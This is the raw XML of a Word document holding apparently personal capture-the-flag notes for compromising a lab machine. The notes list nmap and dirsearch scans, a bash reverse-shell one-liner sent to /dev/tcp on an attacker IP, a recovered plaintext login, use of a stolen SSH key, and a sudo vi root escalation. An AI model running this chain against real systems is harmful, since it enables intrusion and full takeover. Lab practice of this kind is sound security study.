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3ED9" w14:textId="450BD03B" w:rsidR="007B53D0" w:rsidRDefault="00BF1B2A">
      <w:r w:rsidRPr="00BF1B2A">
        <w:t xml:space="preserve">nmap -sV -sS 10.10.240.128  -vv  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71404EFB" w14:textId="22B5D54A" w:rsidR="00BF1B2A" w:rsidRDefault="00C123F6">
      <w:r w:rsidRPr="00C123F6">
        <w:t>dirsearch 10.10.240.128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C43B3F" w14:textId="7B9F7562" w:rsidR="00D67C3E" w:rsidRDefault="00D67C3E">
      <w:r>
        <w:t>home.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F671CE0" w14:textId="2AAA4BD9" w:rsidR="00D67C3E" w:rsidRDefault="00D67C3E">
      <w:r>
        <w:t>bash -c 'exec bash -i &amp;&gt;/dev/tcp/10.8.198.86/1337 &lt;&amp;1'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">    (execute command )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622C8578" w14:textId="33135416" w:rsidR="000951CB" w:rsidRDefault="000951CB">
      <w:r>
        <w:t xml:space="preserve">username: Charlie   </w:t>
      </w:r>
      <w:r w:rsidRPr="000951CB">
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> : </w:t>
      </w:r>
      <w:r w:rsidRPr="000951CB">
        <w:t>cn7824</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CC388C" w14:textId="36A3BC4A" w:rsidR="00D67C3E" w:rsidRDefault="00231549">
      <w:r w:rsidRPr="00231549">
        <w:t>strings key_rev_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427B33A8" w14:textId="00A1A404" w:rsidR="004B52FF" w:rsidRDefault="006E25F9">
      <w:r>
        <w:t>(copy ssh key from teleport )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541DECEB" w14:textId="43949750" w:rsidR="00986E80" w:rsidRDefault="00986E80">
      <w:r w:rsidRPr="00986E80">
        <w:t>ssh charlie@10.10.240.128 -i sshkey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52277B86" w14:textId="1EBA9E31" w:rsidR="000E2C24" w:rsidRDefault="000E2C24"/>
    <w:p w14:paraId="78536E80" w14:textId="55B53467" w:rsidR="00B658D1" w:rsidRDefault="00B658D1">
      <w:r>
        <w:br/>
        <w:t>(search vi vulnerability to sudo)</w:t>
      </w:r>
      <w:r w:rsidR="00B54B5D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidR="00B54B5D" w:rsidRPr="005C379C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://gtfob</w:t>
        </w:r>
        <w:r w:rsidR="00B54B5D" w:rsidRPr="005C379C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>i</w:t>
        </w:r>
        <w:r w:rsidR="00B54B5D" w:rsidRPr="005C379C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>ns.github.io/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FF6A679" w14:textId="0EF28D7A" w:rsidR="00B54B5D" w:rsidRDefault="00B54B5D">
      <w:r w:rsidRPr="00B54B5D">
        <w:t>sudo vi -c ':!/bin/bash' /dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2A316E" w14:textId="2E2288B7" w:rsidR="007D6708" w:rsidRDefault="007D6708">
      <w:r w:rsidRPr="007D6708">
        <w:t>python root.py</w:t>
      </w:r>
      <w:r w:rsidR="00741CAE">
        <w:t xml:space="preserve"> (in root directory)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC3DF3" w14:textId="77777777" w:rsidR="007D6708" w:rsidRDefault="007D6708"/>
    <w:p w14:paraId="7FCFE8BF" w14:textId="77777777" w:rsidR="00D67C3E" w:rsidRDefault="00D67C3E"/>
    <w:sectPr w:rsidR="00D6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92"/>
    <w:rsid w:val="000951CB"/>
    <w:rsid w:val="000E2C24"/>
    <w:rsid w:val="00231549"/>
    <w:rsid w:val="00461A92"/>
    <w:rsid w:val="004B52FF"/>
    <w:rsid w:val="006E25F9"/>
    <w:rsid w:val="00741CAE"/>
    <w:rsid w:val="007B53D0"/>
    <w:rsid w:val="007D6708"/>
    <w:rsid w:val="00986E80"/>
    <w:rsid w:val="00B54B5D"/>
    <w:rsid w:val="00B658D1"/>
    <w:rsid w:val="00BF1B2A"/>
    <w:rsid w:val="00C123F6"/>
    <w:rsid w:val="00D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1249"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{37E3E98A-7384-4E25-A91C-B780C2AA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B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tfobin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2023-12-01T17:53:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-01T18:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>